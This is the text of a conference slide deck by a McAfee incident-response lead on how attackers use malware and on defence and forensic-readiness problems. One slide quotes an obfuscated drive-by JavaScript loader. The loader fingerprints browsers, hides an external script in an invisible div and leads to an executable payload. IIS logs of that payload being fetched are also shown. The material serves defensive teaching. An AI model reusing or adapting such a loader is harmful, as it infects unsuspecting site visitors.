Malware Offensive usage and how to defend

Christiaan Beek

McAfee Professional Services

Agenda

• $whoami

• Examples

• Offensive ways of using malware

• What goes wrong

• Defense recommendations

• Final thoughts

> whoami

• Christiaan Beek

• Practice lead IR & Forensics EMEA

• Developer/Instructor MFIRE

• Training CERTS

A Little Background

Foundstone Services – McAfee Strategic Security

OFFENSE

Offensive usage of malware

ENERGY & INFRA Financial MEDICAL

MOBILE Defense

Offensive usage of malware

Why malware?

• low profile during preparation

• many options to spread / infect

• many ways to hide

• self destruct mechanism

• many ways to transfer data to

Offensive usage of malware

• More and more discovery of malware frameworks

• Multiple modules /components

• Written by pro’s – sponsored by nations

Offensive - What’s Different?

Development Delivery Detection Command & Control Intent

• Nation-States

• Truly

customized

payloads

• Zero day

propagation

• Multi-vectored:

Blue tooth,

USB, network

• Digitally signed

with

compromised

certificates

• Outbound ex-

filtration

masking

• Central

command

• Modular

payloads

• Surveillance

• Disrupt /

Destroy

Stages of an attack:

Stages of an attack:

Stages of an attack:

Stages of an attack:

Stages of an attack – first script

script type="text/javascript" src="swfobject.js"></script>

<script src=jpg.js></script>

<script type="text/javascript">

if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 &&

hiOC2.indexOf("spider")==-1)

var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion();

var expires=new Date();

expires.setTime(expires.getTime()+1*60*60*1000);

document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString();

for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 &&

(navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length-

1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 =

eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new

function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e)

}

</script>

<DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript"

src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>

Final destination?:

hxxp://222.7x.xx.xx.xx/x.exe

Inner working?

IIS logs on hacked ‘landing’ server:

9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe

9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe

9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe

9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe

9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe

9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe

9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe

Dial 80 Or 443

War story

Future usage of malware

Future scenario’s

Future scenario’s or real...?

Future scenario’s

Future scenario’s

Future scenario’s

Future scenario’s

Future scenario’s

Future scenario’s

An Intel company

What goes wrong regarding Defense?

An Intel company

Problem #1

Many solutions but how to use them?

Forensic Readiness?

An Intel company

Problem #2

No visibility on the network

No correlation of events

An Intel company

Problem #3

Lack of skilled,

experienced and

dedicated people

An Intel company

Problem #4

No Incident Response procedures

No Dry-run exercise

An Intel company

Problem #5

The attack came

from…..

An Intel company

Problem #6

Destroying evidence

An Intel company

Problem #7

who is the system owner?

who will take action?

who is allowed to take

decisions?

An Intel company

Defense Strategies

The Big “Threat” Picture

All Threats All Known

Threats

Threats

AntiVirus

Sees

Threats

AntiVirus

Protects

Core

The “Core” Security Problem

• “Unauthorized” Execution

– Payload/attachment/link

– Network

– Privilege

• “Authorized” Execution

– Insiders misuse of privilege

End Users = Data

Identity

Thieves Spammers

Tool

Developers

Vulnerability

Discoverers

Malware Developers

100101010010110

Bot Herder

Defense-in-depth

Worthless without:

An Intel company

Final thoughts......

- Incidents happen

- Is forensic & malware readiness on your agenda?

- What needs to be changed in your process?

- Is your {army-unit/company/agency/etc} prepared?

- Did you separate critical infrastructures?

- Can we help you?

An Intel company

Thank you!

Keep in touch:

Email: Christiaan_Beek@McAfee dot com

Twitter: @FSEMEA @Foundstone @ChristaanBeek